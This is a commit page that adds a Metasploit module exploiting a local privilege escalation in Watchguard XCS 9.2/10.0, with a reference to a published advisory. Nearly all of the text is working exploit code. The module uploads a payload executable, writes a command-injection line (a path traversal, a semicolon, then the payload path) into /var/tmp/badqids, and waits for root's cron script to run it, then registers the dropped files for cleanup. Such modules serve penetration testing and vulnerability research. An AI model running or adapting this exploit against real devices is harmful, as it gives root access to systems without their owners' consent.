Split off privesc into a seperate module

2015-09-16 23:11:32 +12:00 · 2015-09-16 23:11:32 +12:00 · bdd90655e4
parent 4e22fce7ef
commit bdd90655e4
1 changed files with 94 additions and 0 deletions
--- a/modules/exploits/freebsd/misc/watchguard_local_privesc.rb
+++ b/modules/exploits/freebsd/misc/watchguard_local_privesc.rb
@ -0,0 +1,94 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::EXE
+  include Msf::Post::File
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Watchguard XCS Local Privilege Escalation',
+      'Description'    => %q{
+        This module exploits a vulnerability in the Watchguard XCS 'FixCorruptMail' script called by root's crontab
+        which can be exploited to run a command as root within 3 minutes.
+      },
+      'Author'         =>
+        [
+          'Daniel Jensen <daniel.jensen[at]security-assessment.com>' # discovery and Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['URL','http://security-assessment.com/files/documents/advisory/Watchguard-XCS-final.pdf']
+        ],
+      'Platform'       => 'bsd',
+      'Arch'           => ARCH_X86_64,
+      'SessionTypes'   => [ 'shell' ],
+      'Privileged'     => false,
+      'Targets'        =>
+        [
+          [ 'Watchguard XCS 9.2/10.0', { }]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Jun 29 2015'
+    ))
+  end
+
+  def check
+    #Basic check to see if the device is a Watchguard XCS
+    res = cmd_exec('uname -a')
+    return Exploit::CheckCode::Appears if res =~ /support-xcs@watchguard.com/
+
+    Exploit::CheckCode::Safe
+  end
+
+  def upload_payload
+    #Generates and uploads the payload to the device
+    fname = "/tmp/#{Rex::Text.rand_text_alpha(5)}"
+    @pl = generate_payload_exe
+    write_file(fname, @pl)
+    return nil if not file_exist?(fname)
+    cmd_exec("chmod +x #{fname}")
+    return fname
+  end
+
+  def exploit
+    print_status("Rooting can take up to 3 minutes.")
+
+    #Generate and upload the payload
+    filename = upload_payload
+    fail_with(Failure::NotFound, "Payload failed to upload") if filename.nil?
+    print_status("Payload #{filename} uploaded.")
+
+    #Sets up empty dummy file needed for privesc
+    dummy_filename = "/tmp/#{Rex::Text.rand_text_alpha(5)}"
+    cmd_exec("touch #{dummy_filename}")
+    vprint_status("Added dummy file")
+
+    #Put the shell injection line into badqids
+    #setup_privesc = "echo \"../../../../../..#{dummy_filename};#{filename}\" > /var/tmp/badqids"
+    badqids = write_file("/var/tmp/badqids","../../../../../..#{dummy_filename};#{filename}")
+    fail_with(Failure::NotFound, "Failed to create badqids file to exploit crontab") if badqids.nil?
+    print_status("Badqids created, waiting for vulnerable script to be called by crontab...")
+    #cmd_exec(setup_privesc)
+
+    #Cleanup the files we used
+    register_file_for_cleanup("/var/tmp/badqids")
+    register_file_for_cleanup(dummy_filename)
+    register_file_for_cleanup(filename)
+
+    #Wait for crontab to run vulnerable script
+    select(nil,nil,nil,180) #Wait 3 minutes to ensure cron script is run
+    print_status("Ran out of time, should have root shell by now.")
+
+  end
+
+end